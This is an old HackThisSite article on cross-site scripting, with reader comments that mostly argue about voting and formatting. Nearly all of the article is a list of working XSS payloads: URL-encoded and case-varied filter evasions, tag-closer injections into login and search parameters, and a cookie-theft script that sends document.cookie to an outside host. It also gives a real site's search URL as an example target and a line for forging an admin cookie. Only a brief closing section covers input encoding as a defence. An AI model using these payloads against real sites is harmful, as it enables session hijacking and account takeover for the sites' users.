Hack This Site!

[Advertise With HackThisSite.org :: Hide These Ads]

HTS costs $300 a month to operate. We need your help!

Donors also receive special recognition on our donors page.

FR DE ES IT PT

Link to us!

phoenix free shells
hackergames.net
PullThePlug

XSS
Published by: Pulse, on 2007-08-22 05:51:01
Cross Site Scripting exsistance is because of the lack of filtering engines to user inputs at websites on forms. Hackers Evil Links <a href="[http://<XSS-host]/xssfile?evil request">Free Laptop!</a> <iframe src="[http://<XSS-host]/xssfile?evil request">Free Laptop!</iframe> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://www.Site.com/xss.js"></SCRIPT> XSS Cookie theft Javascript http://host/a.php?variable="><script>document.location='http://www.mysite.com/cgi-bin/cookie.cgi? '%20+document.cookie</script> Moding Cookies (Put in your browsers address bar) CODE : `javascript:void(document.cookie="username=Admin")` How to Search for Vul Hosts CODE : [host]/<script>alert("XSS")</script> [host]/<script>alert('XSS')</script>/ [host]/<script>alert('XSS')</script>. [host]/<script>alert('XSS')</script> [host]/<script>alert('XSS')</script> [host]/perl/<sCRIPT>alert("d")</sCRIPT>.pl [host]/<sCRIPT>alert("d")</sCRIPT> [host]/<73CRIPT>alert("dsf")</73CRIPT> [host]/<73CRIPT>alert('dsf')</73CRIPT> [host]/</sCRIP/T>alert("dsf")<///sCRIP/T> [host]/</sCRIP/T>alert('dsf')<///sCRIP/T> <script>javascript:alert(documentt.cookie)</script> <script>javascript:alert("XSS")</script> "<script>alert()</script>"This Site is not Secure! [host]/?<script>alert('XSS')</script> - Also use "?" post request after the host. WebServers XSS Many webservers have default pages to folders that will look for a file. CODE : `[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".bas [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".asp [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".jsp [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".htm [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".html [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".[ext]` A common place for an XSS hole is inside a server default example files, such as: CODE : `[host]/cgi/example?test=<script>alert('xss')</script>` Most common places to find XSS in are the search files of servers. CODE : `[host]/search.php?searchstring=<script>alert('XSS')</script> [host]/search.php?searchstring="><script>alert('XSS')</script> [host]/search.php?searchstring='><script>alert('XSS')</script>` Social Engineering XSS Using the characters instead may fool the filters and allow XSS to work. CODE : [host]/%3cscript%3ealert('XSS')%3c/script%3e [host]/%3c%53cript%3ealert('XSS')%3c/%53cript%3e [host]/%3c%53cript%3ealert('XSS')%3c%2f%53cript%3e [host]/%3cscript%3ealert('XSS')%3c/script%3e [host]/%3cscript%3ealert('XSS')%3c%2fscript%3e [host]/%3cscript%3ealert(%27XSS%27)%3c%2fscript%3e [host]/%3cscript%3ealert(%27XSS%27)%3c/script%3e [host]/%3cscript%3ealert("XSS")%3c/script%3e [host]/%3c%53cript%3ealert("XSS")%3c/%53cript%3e [host]/%3c%53cript%3ealert("XSS")%3c%2f%53cript%3e [host]/%3cscript%3ealert("XSS")%3c/script%3e [host]/%3cscript%3ealert("XSS")%3c%2fscript%3e [host]/%3cscript%3ealert(%34XSS%34)%3c%2fscript%3e [host]/%3cscript%3ealert(%34XSS%34)%3c/script%3e [host]/?%3cscript%3ealert('XSS')%3c/script%3e - Also use "?" post request after the host. 100% encoded CODE : `[host]/?%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e` CODE : `[host]/?%27%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e` CODE : `[host]/%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e` Another form of encoding is: <script>alert(document.cookie)</script> < is encoded as: < > is encoded as: > CODE : `%3Cscript%3Ealert(%22XSS%22)%3C/script%3E <script>alert("XSS")</script> <script>alert("XSS")</script> <script>alert(%34XSS%34)</script> <script>alert('XSS')</script>` www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E Any of the XSS requests presented above could be used on any asp, cfm, jsp, cgi, php or any other active html file. CODE : `[host]/forum/post.asp?<script>alert('XSS')</script> [host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e [host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e [host]/forum/post.asp?%3cscript%3ealert(%34XSS%34)%3c/script%3e [host]/forum/post.asp?<script>alert("XSS")</script>` Finding errors such as inputting a string instead of a number or "" or "/" instead of a string, or a very long string & a very large number. All this malformed parameters can help us find the place to inject XSS script. Tag Closer The "Tag Closer" method is used by inputing non-alphabetic and non-numeric chars inside form's input text boxes. This chars could be: ,/,~,!,#,$,%,^,&,-,[,],null(char 255),.(dot) But the chars that mostly does the job is either " or '. What we do is just insert "> or '> inside a text box instead of our name/email/username/password and etc... CODE : [host]/admin/login.asp?username="><script>alert('XSS')</script>&password=1234 [host]/admin/login.asp?username=admin&password="><script>alert('XSS')</script> [host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"> < /textarea>--><script>alert('XSS')</script> [host]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script> [host]/admin/login.asp?username='><script>alert('XSS')</script>&password=1234 [host]/admin/login.asp?username=admin&password='><script>alert('XSS')</script> [host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~'></textarea>--> < script>alert('XSS')</script> [host]/search.php?action=soundex&firstname='><script>alert(document.cookie)</script> This mainly works on the servers root: CODE : `[host]/?"><script>alert('XSS')</script> [host]/?'><script>alert('XSS')</script> [host]/?--><script>alert('XSS')</script>` About <plaintext> Another trick for exploiting an XSS was found by putting a <plaintext> tag after the xss code. Sometimes that makes it easie to exploit. CODE : [host]/?"><script>alert('XSS')</script><plaintext> [host]/?'><script>alert('XSS')</script><plaintext> [host]/admin/login.asp?username="><script>alert('XSS')</script><plaintext>&password=1234 [host]/admin/login.asp?username=admin&password="><script>alert('XSS')</script><plaintext> [host]/forum/post.asp?<script>alert('XSS')</script><plaintext> [host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e<plaintext> [host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e<plaintext> [host]/forum/post.asp?%3cscript%3ealert(%34XSS%34)%3c/script%3e<plaintext> [host]/forum/post.asp?<script>alert("XSS")</script><plaintext> [host]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script> & lt;plaintext> www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E %3Cplaintext%3E Simple Codes just incase some of them do-not seem to work: CODE : `< /title><script>alert("XSS");</script><title><plaintext> < script>alert(document.cookie)</script><plaintext>` Security Conclusion Repace: CODE : `< with < > with > & with & " with &quote;` Possible XSS: CODE : `<applet> <frameset> <layer> <body> < html> <ilayer> <embed> <iframe> < meta> <frame> <img> <object> < script> <style>` The best protection against it is filtering and removing from recieved input any non-alphabetic and non-numeric chars and testing to make sure that the filtering system works! "To make XSS and SQL Injections Leet you must apply Social Engineering" by Doz
Cast your vote on this article *Note: the order of the votes has been reversed.

Comments:
Published: 17 comments.



By: jourdie - 05:08 am Wednesday August 22nd, 2007

		That was pretty decent, a little messy though, try and use some tabs to make it easier to read..8/10!

By: Cypher101 - 01:41 pm Wednesday August 22nd, 2007

		I had to give it a 7 to avoid a warn from faith. I just didn't have a good enough reason to explain a 6.....???

By: lordofwhee - 02:13 pm Wednesday August 22nd, 2007

		Doesn't really explain anything, just gives a list of examples and a small explanation of certain aspects, not enough to actually understand XSS, or, really, any of the exploits themselves.

By: ScrAm - 03:06 pm Wednesday August 22nd, 2007

		You didn't use any of the BBCode, especially [code][/code] tags.. it would've made it look a LOT neater.

By: yourmysin - 04:30 pm Wednesday August 22nd, 2007

		This article was kind of messy, ill try to clean it up a bit. Pulse, it seems you do not understand BBcode, or do not know we have it, but please use it. Your content is great, but the formatting is now. In my opinion there was to many example links, and encoded ascii.

By: dialup_haxor - 07:19 pm Wednesday August 22nd, 2007

		It's OK, but could be a lot better. -3 for formatting.

By: Jheshka - 09:17 pm Wednesday August 22nd, 2007

		[code] BBCodes + better spacing would've made this easier to read, but a lot of good data. Good job :D

By: lordofwhee - 10:41 pm Wednesday August 22nd, 2007

		Wow, now everyone is just voting 7 and 8 to avoid having to explain themselves. Kinda defeats the purpose of the voting system...

By: Bliepo32 - 12:45 am Thursday August 23rd, 2007

		But you are still going on with giving 1's. This is, according to you, because the articles are of low quality. I however believe otherwise. Most of the articles are of reasonable quality, and are worth a 7, or at least a 6. I believe you just seem to think it's funny to give people a 1, or you want 'revenge' for some reason. Maybe because your articles have never been accepted? I don't even know if you tried to make an article. Maybe it would be a good idea to make an article yourself, so you know how hard that is. If you do so, then I will give you a 1. So you know how it feels. I also think it would be a good idea to take your voting powers from you. Unfortunately, I am not the person to make this decision. Edit: Wow at his profile comments? ehm... what does wow mean?

By: liuyuan - 12:48 am Thursday August 23rd, 2007

		Bliepo32, wow at his profile comments....

By: igykalen - 05:05 pm Friday August 24th, 2007

		Why does every other site have the ability to weed out crazy votes using a system, but a site created by hackers can't figure one out? A one means it sucks. No need for an explanation. And why 7? shouldn't 5 be middle. Now every article will end up great! bad system. I think the ones help counter the 10's given for no reason. For system example http://www.imdb.com/title/tt0120815/ratings

By: Cypher101 - 06:29 pm Friday August 24th, 2007

		What is iVote? Who cares what others voted. And isn't the internet about anoymonity and privacy. Why should anyone be allowed to see everyone else's votes? especially when many already tell you what they voted. Not to mention it makes it hard to look at when trying to read any of the comments. Whose brainchild was this idea? Sorry to post off topic. But so does iVote.

By: kjar23 - 05:35 am Tuesday October 02nd, 2007

		i kinda find this hard if anyone can help me with xss thank you

By: kjar23 - 05:36 am Tuesday October 02nd, 2007

		i kinda find this hard if anyone can help me with xss thank you

By: BiLLo - 08:12 pm Thursday October 04th, 2007

		would a good way to stop xss on a chatbox be to filter </script> ?

By: diggan - 03:27 pm Monday November 19th, 2007

		Thanks :D

By: cleverhacker - 12:21 pm Sunday March 09th, 2008

		its great but can some one help me :D

This site is the collective work of the HackThisSite staff. Please don't reproduce in part or whole without permission.
Page Generated: Wed, 08 Oct 2008 03:55:46 -0500 Exec: 9

Donate

Challenges

Get Informed

Get Involved

Communicate

About HTS

Translate

Partners